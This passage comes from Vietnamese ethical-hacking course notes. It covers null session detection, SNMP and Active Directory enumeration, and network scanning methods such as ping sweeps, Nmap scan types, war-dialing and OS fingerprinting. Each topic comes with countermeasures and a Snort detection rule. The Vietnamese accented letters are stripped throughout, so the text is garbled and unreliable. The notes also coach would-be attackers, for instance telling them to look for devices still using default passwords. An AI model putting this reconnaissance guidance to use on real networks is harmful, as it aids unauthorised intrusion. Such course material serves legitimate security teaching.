Nhng cng ny c s dng cho mi chc nng kt ni mng ca Windows, bao gm chia s File, in n qua mng, Clustering, v qun tr t xa. Lu : Tin trnh chn truy cp ti cng cn c cn nhc k trc khi thc hin trn nhiu cng. Xc nh Null Session vi IDS Nu nhng thay i trong Registry hay Firewall loi b chc nng ca cc ng dng mng th chng ta phi s dng mt phng php khc. Thay v chn thng k qua Null Session, mt trong nhng bin php hu hiu nht l pht hin ra tn cng Null Session mt cch sm nht c th trin khai nhng bin php khc phc kp thi nh khi thc hin mt s kin bo mt mng thng thng.

Nu ang s dng Snort, mt IDS/IPS (H thng pht hin v chn xm nhp mng) ph bin nht hin nay trong mi trng sn xut, th rule sau y s pht hin thng k Null Session: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:NETBIOS NT NULL session; flow:to_server.establshed; content: |00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4E 00 54 00 20 00 31 00 33 00 38 00 31|; classtype:attempted-recon;) Rule ny s khng ngn chn cc kt ni Null Session, tuy nhin n s thng bo khi Null Session xy ra. Nng cp h iu hnh Gii php cui cng nh cp trn l nng cp h iu hnh. Null Session ch d dng thc hin vi h iu hnh i c trc nm 2000. Cn sau nh Windows XP, Windows 2003 th vic ny c Microsoft tch hp trong sn phm. Do , nng cp h iu hnh lm chng ta yn tm hn.

3. K thut lit k SNMP (Simple Network Management Protocol)


Tm hiu v SNMP
SNMP l giao thc qun l mng n gin, dch t cm t Simple Network Management Protocol. Th no l giao thc qun l mng n gin ? Giao thc l mt tp hp cc th tc m cc bn tham gia cn tun theo c th giao tip c vi nhau. Trong lnh vc thng tin, mt giao thc quy nh cu trc, nh dng (format) ca dng d liu trao i vi nhau v quy nh trnh t, th tc trao i dng d liu . Nu mt bn tham gia gi d liu khng ng nh dng hoc khng theo trnh t th cc bn khc s khng hiu hoc t chi trao i thng tin. SNMP l mt giao thc, do n c nhng quy nh ring m cc thnh phn trong mng phi tun theo. Mt thit b hiu c v hot ng tun theo giao thc SNMP c gi l c h tr SNMP (SNMP supported) hoc tng thch SNMP (SNMP compartible). SNMP dng qun l, ngha l c th theo di, c th ly thng tin, c th c thng bo, v c th tc ng h thng hot ng nh mun. VD mt s kh nng ca phn mm SNMP:

Theo di tc ng truyn ca mt router, bit c tng s byte truyn/nhn. Ly thng tin my ch ang c bao nhiu cng, mi cng cn trng bao nhiu. T ng nhn cnh bo khi switch c mt port b down. iu khin tt (shutdown) cc port trn switch.

Cc thnh phn trong SNMP Theo RFC 1157, kin trc ca SNMP bao gm 2 thnh phn : cc trm qun l mng (network management station) v cc thnh t mng (network element).

Network management station thng l mt my tnh chy phn mm qun l SNMP (SNMP management application), dng gim st v iu khin tp trung cc network element. Network element l cc thit b, my tnh, hoc phn mm tng thch SNMP v c qun l bi network management station. Nh vy element bao gm device, host v application.

Hnh 6. 4: M hnh minh ha cc thnh phn ca SNMP Mt management station c th qun l nhiu element, mt element cng c th c qun l bi nhiu management sation. Vy nu mt element c qun l bi 2 station th iu g s xy ra ? Nu station ly thng tin t element th c 2 station s c thng tin ging nhau. Nu 2 station tc ng n cng mt element th element s p ng c 2 tc ng theo th t ci no n trc. Ngoi ra cn c khi nim SNMP agent. SNMP agent l mt tin trnh (process) chy trn network element, c nhim v cung cp thng tin ca element cho station, nh station c th qun l c element. Chnh xc hn l application chy trn station v agent chy trn element mi l 2 tin trnh SNMP trc tip lin h vi nhau. Cc v d minh ha sau y s lm r hn cc khi nim ny:

dng mt my ch (station) qun l cc my con (element) chy HH Windows thng qua SNMP th bn phi : ci t mt phn mm qun l SNMP (application) trn my ch, bt SNMP service (agent) trn my con. dng mt my ch (station) gim st lu lng ca mt router (element) th bn phi : ci phn mm qun l SNMP (application) trn my ch, bt tnh nng SNMP (agent) trn router.

Object ID

Mt thit b h tr SNMP c th cung cp nhiu thng tin khc nhau, mi thng tin gi l mt object. (V d: My tnh c th cung cp cc thng tin : tng s cng, tng s port ni

mng, tng s byte truyn/nhn, tn my tnh, tn cc process ang chy, .) Mi object c mt tn gi v mt m s nhn dng object , m s gi l Object ID (OID) (V d: Tn thit b c gi l sysName, OID l 1.3.6.1.2.1.1.5)
Object access

Mi object c quyn truy cp l READ_ONLY hoc READ_WRITE. Mi object u c th c c nhng ch nhng object c quyn READ_WRITE mi c th thay i c gi tr. VD : Tn ca mt thit b (sysName) l READ_WRITE, ta c th thay i tn ca thit b thng qua giao thc SNMP. Tng s port ca thit b (ifNumber) l READ_ONLY, d nhin ta khng th thay i s port ca n.
Management Information Base

MIB (c s thng tin qun l) l mt cu trc d liu gm cc i tng c qun l (managed object), c dng cho vic qun l cc thit b chy trn nn TCP/IP. MIB l kin trc chung m cc giao thc qun l trn TCP/IP nn tun theo, trong c SNMP. MIB c th hin thnh 1 file (MIB file), v c th biu din thnh 1 cy (MIB tree). MIB c th c chun ha hoc t to. Mt manager c th qun l c mt device ch khi ng dng SNMP manager v ng dng SNMP agent ng h tr mt MIB. Cc ng dng ny cng c th h tr cng lc nhiu MIB.
Cc phng thc ca SNMP

Giao thc SNMP c 5 phng thc hot ng, tng ng vi 5 loi bn tin nh sau:

SNMP Enumeration ?
K thut SNMP Enumeration l qu trnh s dng SNMP lit k cc ti khon ngi dng trn mt h thng mc tiu. Hu ht tt c cc thit b h tng mng, nh router,switch v bao gm c h thng Windows, cha ng mt SNMP agent qun l h thng hoc thit b. Cc trm qun l SNMP gi yu cu ti cc agent v agent tr li li.Cc yu cu v cc s tr li c gi n cc bin truy cp cu hnh bi phn mm agent. Cc trm qun l c th lun gi cc yu cu thit lp gi tr cho cc bin nht nh. Cc trm qun l nhn gi Trap t agent bit mt vi iu quan trng va xy ra trn phn mm agent nh c s khi ng li hay mt li giao din. SNMP c hai password s dng truy cp v cu hnh SNMP agent t trm qun l. Ci u tin c gi l read community string, password ny cho php bn xem cu hnh ca thit b hoc h thng. Ci th hai c gi l read/write community string, n c dng thay i hay chnh sc cu hnh trn thit b. Ni chung, mc nh read community string l public, cn read/write community string l private. Mt l hng bo mt ph bin xy ra khi cc community string khng thay i so vi cc thit lp mc nh. Mt hacker c th s dng nhng password mc nh xem hoc thay i cu hnh trn thit b.

Nu bn c bt k cu hi v vic lm cch no xc nh password mc nh ca cc thit b ,truy cp vo www.defaultpassword.com.


Hacking tool

SNMPUtil v Network Browser l cc cng c lit k SNMP.

SNMPUtil tp trung thng tin v ti khon ngi dng qua SNMP trong cc h thng Windows. Mt vi thng tin nh cc bng v cc cng vic hng ngy,cc bng ARP,a ch IP,a ch MAC, cc cng m TCP v UDP, ti khon ngi dng v cc phn chia s c th b c t mt h thng Windows ni SNMP cho php s dng cng c SNMPUtil. IPNetworkBrowser t cc cng c SolarWinds cng s dng SNMP thu thp thm thng tin v mt thit b c mt SNMP agent.

i ph vi k thut lit k SNMP


Cch n gin nht ngn chn k thut lit k SNMP l g b ht cc SNMP agent hoc tt dch v SNMP. Nu khng c chn tt SNMP, hy thay i tn mc nh read v read/write community. Thc thi bo mt trong Group Policy thm iu kin ngn nga kt ni ngi dng nc danh.

4. Active Directory Enumeration


Active Directory (AD) l g ?
Active Directory l mt c s d liu ca cc ti nguyn trn mng (cn gi l i tng) cng nh cc thng tin lin quan n cc i tng . Tuy vy, Active Directory khng phi l mt khi nim mi bi Novell s dng dch v th mc (directory service) trong nhiu nm ri. Mc d Windows NT 4.0 l mt h iu hnh mng kh tt, nhng h iu hnh ny li khng thch hp trong cc h thng mng tm c x nghip. i vi cc h thng mng nh, cng c Network Neighborhood kh tin dng, nhng khi dng trong h thng mng ln, vic duyt v tm kim trn mng s l mt c mng (v cng t hn nu bn khng bit chnh xc tn ca my in hoc Server l g). Hn na, c th qun l c h thng mng ln nh vy, bn thng phi phn chia thnh nhiu domain v thit lp cc mi quan h u quyn thch hp. Active Directory gii quyt c cc vn nh vy v cung cp mt mc ng dng mi cho mi trng x nghip. Lc ny, dch v th mc trong mi domain c th lu tr hn mi triu i tng, phc v mi triu ngi dng trong mi domain.

Chc nng ca Active Directory


Lu gi mt danh sch tp trung cc tn ti khon ngi dng, mt khu tng ng v cc ti khon my tnh. Cung cp mt Server ng vai tr chng thc (authentication server) hoc Server qun l ng nhp (logon Server), Server ny cn gi l domain controller (my iu khin vng). Duy tr mt bng hng dn hoc mt bng ch mc (index) gip cc my tnh trong mng c th d tm nhanh mt ti nguyn no trn cc my tnh khc trong vng. Cho php chng ta to ra nhng ti khon ngi dng vi nhng mc quyn (rights) khc nhau nh: ton quyn trn h thng mng, ch c quyn backup d liu hay shutdown Server t xa Cho php chng ta chia nh min ca mnh ra thnh cc min con (subdomain) hay cc n v t chc OU (Organizational Unit). Sau chng ta c th y quyn cho cc qun tr vin b phn qun l tng b phn nh.

Active Directory Enumeration


Lit k trong AD c ngha l truy vn tm kim nhng thng tin c lin quan n AD v cc server trong Windows ng dng qua AD. Nhng k thut di y chng ta s tm hiu cc k thut lit k NTP, WEB, DNS, LDAP User Account Enumeration C ngha l lit k nhng thng tin c lin quan n user, nh username, phone, mail, first name, addressNhng thng tin c lin quan khi bn thc hin mt hnh thc tn cng khc. V d nh bn mun d tm mt khu ca user th hy nh mt quy tc, user thng t mt khu l nhng g c lin quan n mnh nh ngy sinh, s in thoi, s nh, s xe
Hacking Tool

Sid2user v User2sid l hai cng c dng dng lnh gip bn lit k cc thng tin c lin n user. GetAcct l chng trnh dng ha, cho php bn tm kim thng tin user trn h iu hnh Win NT v 2000

LDAP Enumeration LDAP (Lightweight Directory Access Protocol) l giao thc truy cp danh sch th mc ca AD hoc nhng dch v directory khc. Th mc c cu trc, cp , nh dng c th. Di y l vi cng c dng lit k da vo giao thc LDAP.
Hacking Tool

Jxplorer: Ngoi chc nng lit k th mc, cng c ny cn h tr chng thc qua SSL, thm ch l vic thm, xa, sa thng tin th mc. Softerra LDAPP Browser, LDAPMiner l hai cng c khc c chc nng tng t. NTP Enumeration NTP (Network Time Protocol) l giao thc c thit k ng b ha thi gian gia cc server. Giao thc hot ng port 123, UDP truyn ti d liu. lit k thng tin c lin quan n NTP Server, bn c th dng cc lnh nh ntpdata, ntptracer, ntpdc, ntpq SMTP Enumeration SMTP (Simple Mail Transport Protocol) l giao thc hot ng port 25TCP gi mail ln POP3 hoc IMAP server nhng server nhn mail. lit k thng tin SMTP server bn c th dng lnh telnet n server.
Hacking Tool

SMTPscan l cng c cho php chng ta tm kim nhng thng tin c lin quan n SMTP Server. Chng trnh hot ng bng cch gi mt gi tin gi n server v c tin nhn tr v bit nhng thng tin ca server. WEB Enumeration HTTP l giao thc web m ai cng bit. N hot ng port 80, v port 443 cho HTTPS. Ngi dng gi yu cu ni dung ln web server. Ti trnh duyt, chng ta g a ch, tt nhin s phi c DNS server thc hin qu trnh truy vn tm ra ip. tm kim nhng tin c lin quan n web server, bn c th bt gi tin tr v v xem thng tin server phn header ca d liu.
Hacking Tool

Asnumber l mt tin ch nh ci vo trnh duyt, hin th thng tin ca server. System Using Default Password

S dng mt khu mc nh v nhng thng tin default khc ca phn cng qu tht khng nn. Tuy nhin, nu bn mun tn cng h thng, hy th tm kim coi c thit b no ang xi password mt nh hay khng. Truy cp www.phenoelit.de/dpl/dpl.html bit cc password mc nh ca thit b.

5. Tng kt
Sau khi kt thc chng ny bn cn nm r cc vn sau:

Hiu r v lit k thng tin user account: Bng cch to ra kt ni n h thng ch bng nhng giao thc nh SMB/ CIFS hoc NetBIOS truy vn thng tin h thng. Trnh by c nhng thng no c th lit k t h thng. Nhng thng bao gm ti nguyn mng chia s, user, group v nhng ng dng. L gii Null Session l g? V nhng k tn cng da trn null session. Kt ni n h thng bng password trng l Null Session. Hacker kt ni n h thng ch thc thi nhng ng dng. Cc cng c hack dng lit k. C th chia hai loi. Loi dng NetBios, loi dng SNMP nh SNMP Until, Enum.

///////////

CHNG 5: SCANNING
Qut (Scanning) l mt bc tip theo trong tin trnh tn cng h thng. Gia on ny gip chng ta xc nh c nhiu thng tin ca mc tiu cn tn cng. Chng trc, bn tm hiu cc vn v Footprinting v Social Engineering, l cng vic lin quan n con ngi. C ngha l chng ta tin hnh thu thp thng tin v t chc m chng ta tn cng, nh v tr a l, thi quen sinh hot ca nhn vinn phn ny, Scanning, chng ta s lm vic vi my mc. Tc l sau khi chng ta tm c vi thng tin c lin quan n my tnh cn tn cng, cng on tip theo l thu thp thng tin v my tnh . Nhng thng tin cn thu thp nh tn my (computer name), a ch ip, cu hnh my tnh, h iu hnh, dch v ang chy, port ang mNhng thng tin ny s gip cho hacker c k hoch tn cng hp l, cng nh vic chn k thut tn cng no. Qut gip nh v h thng cn hot ng trn mng hay khng. Mt hacker chn chnh s dng cch ny tm kim thng tin ca h thng ch.

1. Phn loi Scanning


Sau khi cc giai on hot ng thm d ch ng v b ng ca h thng mc tiu hon tt, chng ta tin hnh qut. Qut c s dng xc nh mt h thng c trn mng hay khng v c ang sn sng hot ng. Cng c qut c s dng thu thp thng tin v mt h thng nh a ch IP, h iu hnh, v cc dch v chy trn cc my tnh mc tiu. Hnh sau lit k ba loi qut ch yu m chng ta nhm ti. Hnh 5.1: Phn loi Scanning

Port scanning
Port scanning l qu trnh xc nh cng TCP/IP m v c sn trn mt h thng. Cng c Port scanning cho php mt hacker tm hiu v cc dch v c sn trn mt h thng nht nh. Mi dch v hay ng dng my tnh c kt hp vi mt s cng thng dng. V d, mt cng c qut l xc nh cng 80 m cho mt web sever ang chy trn . Hacker cn phi bit r vi s cng thng dng. Note : trn h thng windows, nhng cng thng dng nm v tr C:\windows\system32\drivers\etc\services file. Tp tin dch v l mt file n. M tp tin bng Notepad.

Network scanning
Network scanning l mt quy trnh xc nh my ch ang hot ng trn mng, hoc tn cng chng hoc l nh gi an ninh mng. My ch c xc nh bi IP c nhn ca chng. Cc cng c network-scanning c gng xc nh tt c cc my ch trc tip hoc tr li trn mng v a ch IP tng ng ca chng.

Vulnerability scanning
Vulnerability scanning l qu trnh ch ng xc nh cc l hng ca h thng my tnh trn mng. Thng thng, mt my qut l hng u tin xc nh cc h iu hnh v s phin bn, bao gm cc gi dch v c th c ci t. Sau , my qut l hng xc nh cc im yu, l hng trong h iu hnh.Trong giai on tn cng sau , mt hacker c th khai thc nhng im yu t c quyn truy cp vo h thng. Mt h thng pht hin xm nhp (IDS) hay mt mng an ninh tinh vi chuyn nghip vi cc cng c thch hp c th pht hin cc hot ng port-scanning. Cc cng c d qut cng TCP/IP tm kim cc cng m v a ch IP, v l hng thng c th b pht hin, v cc my qut phi tng tc vi h thng ch trn mng.

2. i tng cn qut
Scan l hot ng tng tc trn h thng my tnh. i tng m chng ta ang nhm ti chnh l h thng my tnh vi nhng thnh phn ca n. Khi tin hnh qut h thng, chng ta ch n cc mc ch sau: Live System: Xc nh xem h thng m chng ta ang nhm ti c cn hot ng hay khng. My tnh (host) ang qut c hot ng trn internet hay khng. a ch ip c ang trong trng thy public. Port: Mc tiu tip theo l xc nh cc port ang m. Vic xc nh port ny cho php chng ta bit my tnh ang m cc dch v no. T xc nh c mc ch ca cuc tn cng.

Operating System: Xc nh h iu hnh ang s dng trn my tnh mc tiu s gip hacker tm ra cc l hng thng dng. Cc h iu hnh khng nhiu th t cng tim n nhng l hng to iu kin cho k tn cng t nhp. Xc nh h iu hnh cn phi xc nh phin bn ca n. Service: Hiu r nhng dch v ang chy v lng nghe trn h thng ch. Phin bn ca dch v no cng cha nhng li nh, m nu bit khai thc l nh th n khng cn nh cht no. IP Address: Khng ch c mt ip ca mt host, m chng ta cng cn xc nh dy a ch mng, v nhng host khc c lin quan nh Default gateway, DNS Server

3. Cc phng php qut


Qu trnh Scan c m t trong hnh 4.2. Phng php ny l qu trnh m theo hacker tin hnh qut mng. N m bo rng khng c h thng hoc l hng no b b qua v cc hacker tp hp tt c thng tin cn thit thc hin mt cuc tn cng. Hnh 5.2: Tin trnh scan Theo , tin trnh qut mng c th c m t vn tt qua cc bc nh sau: Kim tra xem h thng c tn ti, c ang hot ng hay khng. Kim tra cc port no ang c m m chng ta c th tng tc c. Nhn bit cc dch v tng ng vi nhng port ang m. Pht ha s mng, c bit ch n nhng host d b tn thng. Ghi du h iu hnh v nhng thng tin c lin quan n h iu hnh. Chun b mt proxy tn cng. Tn cng: Tt nhin y ch mang tnh minh ha, ch thc cht vic tn cng cn nhiu cng on khc.

3.1.

Kim tra s tn ti ca h thng ch

Chng ta s i vo vic tm hiu vi k thut c p dng kim tra s tn ti ca h thng ngay sau y. Tm hiu k thut Ping Sweep Cc phng php qut bt u vi vic kim tra cc h thng sng trn mng, c ngha l h thng phn ng vi cc yu cu thm d hoc kt ni. n gin nht, mc d khng phi l

cch chnh xc nht, cch xc nh d h thng c sng hay khng l thc hin ping sweep cho mt dy IP. Tt c cc h thng phn ng vi mt tin tr li ping c coi l sng trn mng. Internet control message protocol (ICMP) scanning l qu trnh gi mt yu cu ICMP hoc ping cho tt c cc host trn mng xc nh nhng host ang tn ti v tr li ping. Li ch ca ICMP scanning l n c th chy song song, c ngha l tt c cc h thng c qut ng thi, do n c th chy nhanh chng trn ton b mng. Hu ht cc cng c hack bao gm mt la chn ping-sweep, m ch yu l thc hin mt yu cu ICMP n mi my ch trn mng. Mt vn ng k vi phng php ny l phn mm tng la c nhn v tng la h thng mng c th chn h thng t tr li ping sweeps. Mt vn khc l cc my tnh phi c qut.
Hacking Tools

Pinger, Friendly Pinger, and WS_ping_Pro l tt c nhng phn mm c th gip chng ta thc hin qu trnh Ping Sweep. Bn s c hng dn s dng cc cng c ny trong phn lab. Chng li Ping Sweep Hu nh bt k h thng phng chng xm nhp (IDS) hoc hng dn (IPS), s pht hin v cnh bo cho qun tr vin bo mt v mt qu trnh qut ping ang xy ra trn mng. Hu ht cc tng la v proxy server chn tr li ping v vy hacker khng th xc nh chnh xc xem liu h thng c sn sng bng cch s dng mt qu trnh qut ping c. Qut cng dn dp c s dng nu h thng khng tr li vi mt qu trnh qut ping. Ch v mt qu trnh qut ping khng tr li bt k my ch no hot ng trn mng khng c ngha l chng khng c sn, bn cn phi th nhng phng php nhn dng xen k khc. Hy nh hack mt thi gian, kin nhn, v kin tr.

3.2.

Thm d cng(port) v xc nh dch v (service)

Kim tra cc cng ang m l bc th hai trong tin trnh qut. Port scanning l phng php c s dng kim tra cc cng ang m. Qu trnh qut bao gm vic thm d mi cng trn my ch xc nh cc cng ang m. Thng thng Ports scanning c gi tr hn mt qu trnh qut ping v my ch v cc l hng trn h thng. Xc nh cc Service hot ng l bc th ba trong tin trnh. N thng c thc hin bng cch s dng cc cng c tng t nh port scanning. Bng cch xc nh cng m, hacker thng xc nh cc dch v lin kt vi s cng . Bin php i ph Port-Scan Bin php i ph l qu trnh hoc b cng c c s dng bi cc qun tr vin an ninh pht hin v c th ngn chn port-scanning cc my ch trn mng ca h. Danh sch cc

bin php i ph cn c thc hin ngn chn mt hacker thu thp thng tin t qu trnh qut cng: Kin trc an ninh thch hp, chng hn nh thc hin cc IDS v tng la nn c i chung. Hacker chn chnh s dng cng c ca h thit lp kim tra vic Scanning, thc hin cc bin php i ph. Khi tng la c t ra, cng c aport-scanning nn c chy cho cc my ch trn mng cho php tng la pht hin chnh xc v dng cc hot ng ca port-scanning. Tng la c th pht hin cc hot ng thm d c gi bi cc cng c port-scanning. Cc tng la nn tin hnh ly trng thi kim tra (stateful inspections). C ngha l n s kim tra khng ch cc tiu TCP m c d liu ca gi tin xc nh liu c php i qua tng la. Network IDS nn c s dng pht hin cc phng php d tm h iu hnh c s dng bi mt s cng c hacker ph bin nh Nmap. Ch c cc cng cn thit nn c gi trng thi m. Phn cn li s c lc hoc b chn. Cc nhn vin ca t chc s dng cc h thng cn c o to thch hp nhn thc v an ninh. Cng nn bit chnh sch bo mt khc nhau m h ang cn lm theo. Tm hiu Nmap Command Switches Nmap l mt cng c min ph m ngun m thc hin nhanh chng v hiu qu ping sweeps, qut cng, dch v nhn dng, xc nh a ch IP, v xc nh h iu hnh. Nmap c li khi qut s lng ln cc my trong mt phin duy nht. N h tr nhiu h iu hnh, bao gm c Unix, Windows, v Linux. Trng thi ca cng c xc nh bi Nmap scan c th ba trng thi open, filtered, or unfiltered. Open c ngha l cc my tnh mc tiu chp nhn yu cu gi n trn cng . Filtered c ngha l mt bc tng la hoc b lc mng sng lc cc cng v ngn nga Nmap pht hin cho d cng l m. Unfiltered c ngha cng c xc nh l ng, v khng c tng la can thip vi cc yu cu Nmap. Nmap h tr nhiu loi qut. Hnh 4.3 m t mt s phng php qut ph bin Hnh 5.3: Mt s phng php scan h tr bi NMAP Loi Nmap Scan TCP connect XMAS tree scan SYN stealth scan M t K tn cng to kt ni TCP(full TCP) ti h thng ch Nhng k tn cng kim tra dch v TCP bng cch gi gi d liu XMAS-tree. XMAS-tree c ngha l FIN,URG and PSH flag (ngha ca flag gii thch phn sau). c gi l qut na m(haft-open scanning). Hacker gi 1 gi SYN v nhn 1 gi SYN-ACK t server. l 1 cch tng hnh v kt ni full

Null scan

Windows scan ACK scan

TCP khng c m. y l mt cch qut tin tin c th i qua tng la m khng b pht hin hay b sa i. Null (ch c dng nh lc hng trong mt m) scan c tt c c hay khng thit lp. Null scan ch hot ng trn h thng UNIX. y l loi qut tng t nh ACK scan v cng c pht hin cc cng m. Loi qut c s dng vch ra cc quy tc tng la. Ch lm vic trn UNIX.

Nmap c rt nhiu lnh chuyn i thc hin cc loi hnh qut khc nhau. Cc lnh qut ph bin c lit k trong hnh 4.4 Hnh 5.4: Cc ty chn chuyn i ch Scan Bn s i vo tm hiu cch s dng cng c Nmap c th hn trong phn thc hnh. Tm hiu SYN, STEALTH,XMAS, NULL, ADLE, v FIN Scans L hacker bn cn quen thuc vi cc thut ng Scan sau : SYN : SYN hoc stealth scan cng c gi l haft-open scan v n khng thc hin y quy trnh bt tay ba bc ca TCP (three-way hanshake). TCP/IP three-way handshake cp trong phn sau. Hacker gi gi tin SYN n ch, nu nhn li mt SYN/ACK, sau n gi nh cc mc tiu s hon thnh vic kt ni v cc cng ang lng nghe. Nu n nhn mt 1 RST t mc tiu, n gi nh cng khng hot ng hay b ng. Li th ca the SYN stealth scan l t b pht hin hn bi cc h thng IDS, hn l ng nhp nh c gng tn cng hoc kt ni. XMAS: XMAS scans gi mt gi vi c FIN,URG, v PSH c thit lp. Nu cng m, khng p li; nu ng mc tiu gi li gi RST/ACK. XMAS scan ch lm vic trn h thng my ch theo RFC 793 ca TCP/IP v khng chng li bt c version no ca Windows. FIN: FIN scan tng t XMAS scan nhng gi gi d liu ch vi c FIN c thit lp. FIN scan nhn tr li v c gii hn ging nh XMAS scan. NULL: NULL scan cng tng t nh XMAS v FIN trong gii hn v tr li, nhng n ch gi mt packet m khng c flag set. IDLE: IDLE scan s dng a ch IP gi mo gi mt gi SYN n mc tiu. Ph thuc vo tr li, cng c th c xc nh l m hoc ng. IDLE scans xc nh phn ng qut cng bng cch theo di s th t IP header. Giao thc kt ni TCP

Cc loi TCP scan c xy trn TCP three-way handshake. Kt ni TCP yu cu three-way handshake trc khi kt ni c to v truyn d liu gia ngi gi v ngi nhn. Hnh 4.5 m t chi tit cc bc ca TCP three-way handshake. Hnh 5.5: M t quy trnh bt tay ba bc ca TCP hon thnh three-way handshake v to mt kt ni thnh cng gia hai my, ngi gi phi gi mt gi tin TCP vi cc thit lp bit ng b (SYN). Sau , h thng nhn c tr li bng mt gi tin TCP vi cc ng b ha (SYN) v tha nhn bit thit lp phn hi (ACK) cho bit my ch sn sng nhn d liu. H thng ngun s gi mt gi tin cui cng vi cc bit xc nhn thit lp (ACK) ch ra cc kt ni c hon tt v d liu sn sng c gi i. Bi v TCP l mt giao thc hng kt ni, mt quy trnh thit lp kt ni (three-way handshake), khi ng li mt kt ni khng thnh cng v kt thc mt kt ni l mt phn ca giao thc. Nhng giao thc dng thng bo c gi l Flags. TCP cha cc flasg nh ACK, RST, SYN, URG, PSH v FIN. Danh sch di y xc nh cc chc nng ca cc c TCP: SYN-Synchronize. Khi to kt ni gia cc my. ACK-acknowledge. Thit lp kt ni gia cc my. PSH-Push: H thng chuyn tip d liu m. URG-Urgent: D liu trong cc gi phi c s l nhanh chng. FIN-Finish: Hon tt giao tip, khng truyn thm. RST-Reset: Thit lp li kt ni. Hacker c th chng li s pht hin bng cch s dng c thay v hon thnh mt kt ni TCP thng thng.
Hacking Tool

Mt vi cng c sau y xin gii thiu n cc bn thc hin vic Scan Port v xc nh dch v. IPEye l my qut cng TCP c th lm SYN, FIN,Null, v XMAS scans. N l cng c command-line(dng lnh). IPEye thm d cng trn my ch v phn hi li cc trng thi closed, reject, drop, or open. Closed c ngha l c mt my u bn kia nhng n khng lng nghe ti cng. Reject l tng la t chi kt ni ti cng. Drop c ngha l tng la hy b mi th vo cng hoc khng c my tnh u bn kia. Open c ngha mt s loi dch v ang lng nghe ti cng. Nhng phn hi ny gip hacker xc nh loi ca h thng ang tr li.

IPSecScan l cng c c th qut mt a IP duy nht hoc mt dy a ch IP tm kim thng tin h thng. Netscan Tools Pro 2000, Hping2, KingPingicmpenum, v SNMP Scanner l tt c cc cng c qut v cng c th s dng ly du h iu hnh. Icmpenum khng ch dng gi ICMP Echo thm d mng, m cn dng gi ICMP Timestamp v ICMP Information. Hn na, n h tr gi tr li gi mo hoc nh hi. Icmpenum th tuyt vi cho qut mng khi tng la kha ICMP Echo nhng li khi kha Timestamp hoc Information. Hping2 ng ch v n bao gm mt lot cc tnh nng khc ngoi OS fingerprinting nh TCP, User Datagram Protocol (UDP),ICMP, v giao thc ping raw-IP, ch traceroute, v kh nng gi nhiu files gia h thng ngun v ch. SNMP Scanner cho php qut mt dy hoc mt danh sch cc my ch thc hin ping, DNS, v Simple Network Managerment Protocol (SNMP). Tm hiu v k thut War-Dialing War-Dialing l qu trnh quay s modem tm mt kt ni modem ang m, kt ni ny cung cp truy cp t xa vo mng, tn cng vo h thng ch. Thut ng War dialing bt ngun t nhng ngy u ca Internet khi hu ht cc cng ty c kt ni vi Internet thng qua kt ni dial-up modem. War dialing c xem nh l mt phng php qut bi v n tm thy mt kt ni mng m c th c bo mt yu hn so vi cc kt ni Internet chnh. Nhiu t chc thit lp truy cp t xa qua modem, m by gi c, nhng khng th loi b cc my ch truy cp t xa ny. iu ny cho php tin tc d dng xm nhp vo mng vi c ch bo mt yu hn nhiu. V d, nhiu h thng truy cp t xa s dng phng thc xc nhn PAP (Password Authentication Protocol), gi mt khu dng clear text,hay hn na l dng cng ngh VPN mi hn vi mt khu c. War-dialing l cng c lm vic trn tin rng: cc cng ty khng kim sot quay s ti cng cht ch nh tng la, v my tnh vi modem gn lin c mt khp mi ni, ngay c khi nhng modem khng cn s dng. Nhiu my ch vn cn c modem vi ng dy in thoi c kt ni nh l mt sao lu d phng trong trng hp kt ni Internet chnh gp x c. Nhng kt ni modem c th c s dng bi mt chng war-dialing truy cp t xa vo h thng v mng ni b. Hnh 4.6 l m hnh hot ng c bn ca War-dialing. Ti y chng ta thy hacker c th s dng modem ca mnh gi mt kt ni vo h thng mng ca cng. Hnh 5.6: M hnh hot ng ca War-dialing
Hacking Tool

THC-Scan, Phonesweep, war dialer, v telesweep l tt c cng c c s dng xc nh cc s in thoi v c th quay s n mc tiu to kt ni ti modem my tnh.

Nhng cng c thng lm vic bng cch s dng mt danh sch ngi dng v mt khu c xc nh trc c gng truy cp h thng. Hu ht cc truy cp t xa bng kt ni quay s khng c bo v bng mt khu hoc s dng bo mt rt th s.

3.3. Tm hiu v cng ngh Banner Grabing v Operating System Fingerprint


Banner Grabbing v ng nht h iu hnh cng c th nh ngha l Fingerprinting TCP/IP stack l bc th 4 trong phng php qut ca CEH. Qu trnh fingerprinting cho php hacker xc nh vng c bit d b tn thng ca mc tiu trn mng. Banner grabbing l qu trnh to kt ni v c biu ng c gi tr li bi ng dng. Nhiu server (mail, web, ftp) s tr li n mt kt ni telnet vi tn v version ca software. Hacker c th tm thy nhiu mi lin h gia h iu hnh v phn mm ng dng. V d, Microsoft Exchange e-mail server ch ci c trn HH Windows. OS Fingerprint l k thut xc nh thng tin h iu hnh chy trn host ch. C hai phng thc thc hin OS Fingerprint nh sau: Active stack fingerprinting l hnh thc ph bin nht ca fingerprinting. N bao gm vic gi d liu n h thng xem cch h thng tr li. N da trn thc t l cc nh cung cp h iu hnh thc hin cc TCP stack khc nhau, v khc nhau da trn h iu hnh. Cc phn ng ny sau c so snh vi c s d liu xc nh h iu hnh. Active stack fingerprinting b pht hin bi v n c gng nhiu ln kt ni vi h thng mc tiu. Passive stack fingerprinting th tng hnh hn v bao gm s kim tra lu lng trn mng xc nh h iu hnh. N s dng k thut Sniffing thay v k thut Scanning. Passive stack fingerprinting thng khng pht hin ra bi IDS hoc h thng bo mt khc nhng t chnh xc hn Active fingerprinting.
Hacking Tool

S dng telnet cng c th thu thp thng tin h iu hnh, khi bn kt ni n host. POF, HTTPRINT, Mairn HTTP Header l nhng cng c thc hin thu thp thng tin h iu hnh theo c ch Passive. Trong khi cc cng c nh XPRobe2, Ring V2 Nercraft th thu thp thng tin bng c ch Active. i ph vi thu thp thng tin h iu hnh Thay i thng tin h iu hnh trong phn banner header ca webserver. Vi Apache bn c th load module c tn l mod_headers ln, v chnh sa cu hnh trong file httpd.conf Header set Server New Server Name

Vi IIS bn c th s dng cc tool nh IIS lockdown Tool, ServerMask. C hai cng c ny u c chc nng thay i banner header ca server hoc kha hn lun, khng hin th cho ngi dng.

3.4.

V s mng

